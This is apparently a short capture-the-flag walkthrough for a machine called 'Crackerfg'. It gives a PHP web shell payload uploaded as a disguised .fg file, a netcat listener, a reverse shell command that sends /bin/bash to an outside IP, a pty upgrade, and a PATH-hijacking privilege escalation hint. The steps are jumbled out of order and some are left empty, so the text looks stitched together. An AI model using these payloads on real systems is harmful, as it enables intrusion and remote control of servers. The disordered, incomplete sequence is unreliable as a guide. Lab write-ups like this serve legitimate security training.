
Crackerfg _best_ May 2026

Check path hijacking:

eval system($_GET['cmd']);

Rename as shell.fg. After upload, the server stores it in /uploads/shell.fg. Trigger via: crackerfg

Use gobuster:

You get RCE as www-data.

# On attacker machine
nc -lvnp 4444

Via the web shell:

cmd=nc -e /bin/bash 10.10.14.14 4444

python3 -c 'import pty;pty.spawn("/bin/bash")'

Check sudo:

Dashboard reveals a file upload feature for "FG (Fingerprint Generator)" scripts (.fg files). Upload restrictions: only txt and fg. Upload a malicious .fg file:

Run strings /usr/bin/crackerfg – it calls a system command: hashgen.